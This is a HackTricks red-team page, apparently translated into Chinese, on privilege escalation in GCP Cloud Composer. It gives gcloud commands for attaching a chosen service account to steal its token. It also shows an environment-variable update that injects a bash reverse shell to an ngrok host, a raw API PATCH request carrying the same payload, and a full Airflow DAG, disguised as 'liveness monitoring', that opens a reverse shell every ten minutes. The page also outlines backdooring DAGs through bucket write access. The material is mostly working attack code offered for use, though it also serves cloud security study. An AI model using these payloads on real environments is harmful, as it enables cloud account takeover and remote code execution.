GCP - Composer Privesc

Tip

学习并练习 AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

查看 subscription plans!

加入 💬 Discord group 或者 telegram group 或关注我们的 Twitter 🐦 @hacktricks_live.

通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PRs 来分享 hacking tricks。

composer

更多信息：

GCP - Composer Enum

`composer.environments.create`

使用该权限可以将 attach any service account 附加到新创建的 composer 环境。之后你可以在 composer 内执行代码以窃取该 service account 的 token。

创建附带 service account 的 composer 环境

```bash gcloud composer environments create privesc-test \ --project "${PROJECT_ID}" \ --location europe-west1 \ --service-account="${ATTACK_SA}@${PROJECT_ID}.iam.gserviceaccount.com" ```

关于该利用的更多信息见 here.

`composer.environments.update`

可以更新 composer environment，例如修改 env variables：

Update Composer environment variables for code execution

```bash # Even if it says you don't have enough permissions the update happens gcloud composer environments update \ projects//locations//environments/ \ --update-env-variables="PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/19990 0>&1' & #%s" \ --location \ --project

Call the API endpoint directly

PATCH /v1/projects//locations//environments/?alt=json&updateMask=config.software_config.env_variables HTTP/2 Host: composer.googleapis.com User-Agent: google-cloud-sdk gcloud/480.0.0 command/gcloud.composer.environments.update invocation-id/826970373cd441a8801d6a977deba693 environment/None environment-version/None client-os/MACOSX client-os-ver/23.4.0 client-pltf-arch/arm interactive/True from-script/False python/3.12.3 term/xterm-256color (Macintosh; Intel Mac OS X 23.4.0) Accept-Encoding: gzip, deflate, br Accept: application/json Content-Length: 178 Content-Type: application/json X-Goog-Api-Client: cred-type/sa Authorization: Bearer [token] X-Allowed-Locations: 0x0

{“config”: {“softwareConfig”: {“envVariables”: {“BROWSER”: “/bin/bash -c ‘bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/1890 0>&1’ & #%s”, “PYTHONWARNINGS”: “all:0:antigravity.x:0:0”}}}}

</details>

待办：通过向环境添加新的 pypi 包来获得 RCE

### 下载 DAGs

检查正在执行的 DAGs 的源代码：

<details><summary>从 Composer 环境导出并下载 DAGs</summary>
```bash
mkdir /tmp/dags
gcloud composer environments storage dags export --environment <environment> --location <loc> --destination /tmp/dags

导入 Dags

将 python DAG 代码添加到文件中并运行以导入：

将恶意 DAG 导入 Composer 环境

```bash # TODO: Create dag to get a rev shell gcloud composer environments storage dags import --environment test --location us-central1 --source /tmp/dags/reverse_shell.py ```

Reverse shell DAG:

Python DAG 代码（用于 reverse shell）

```python import airflow from airflow import DAG from airflow.operators.bash_operator import BashOperator from datetime import timedelta

default_args = { ‘start_date’: airflow.utils.dates.days_ago(0), ‘retries’: 1, ‘retry_delay’: timedelta(minutes=5) }

dag = DAG( ‘reverse_shell’, default_args=default_args, description=‘liveness monitoring dag’, schedule_interval=‘*/10 * * * *’, max_active_runs=1, catchup=False, dagrun_timeout=timedelta(minutes=10), )

priority_weight has type int in Airflow DB, uses the maximum.

t1 = BashOperator( task_id=‘bash_rev’, bash_command=‘bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/14382 0>&1’, dag=dag, depends_on_past=False, priority_weight=2**31 - 1, do_xcom_push=False)

</details>

### 对 Composer 存储桶的写入权限

所有 composer 环境的组件（DAGs、插件和数据）都存储在 GCP 存储桶中。如果攻击者对其具有读写权限，他可以监控该存储桶，并在 **whenever a DAG is created or updated, submit a backdoored version**，从而使 composer 环境从存储中获取被 backdoored 的版本。

Get more info about this attack in:

<a class="content_ref" href="gcp-storage-privesc.md"><span class="content_ref_label">GCP - Storage Privesc</span></a>

### 导入插件

TODO：检查通过上传插件可能实现哪些危害

### 导入数据

TODO：检查通过上传数据可能实现哪些危害

> [!TIP]
> 学习并练习 AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> 学习并练习 GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> 学习并练习 Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>支持 HackTricks</summary>
>
> - 查看 [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **加入** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) 或者 [**telegram group**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库 提交 PRs 来分享 hacking tricks。
>
> </details>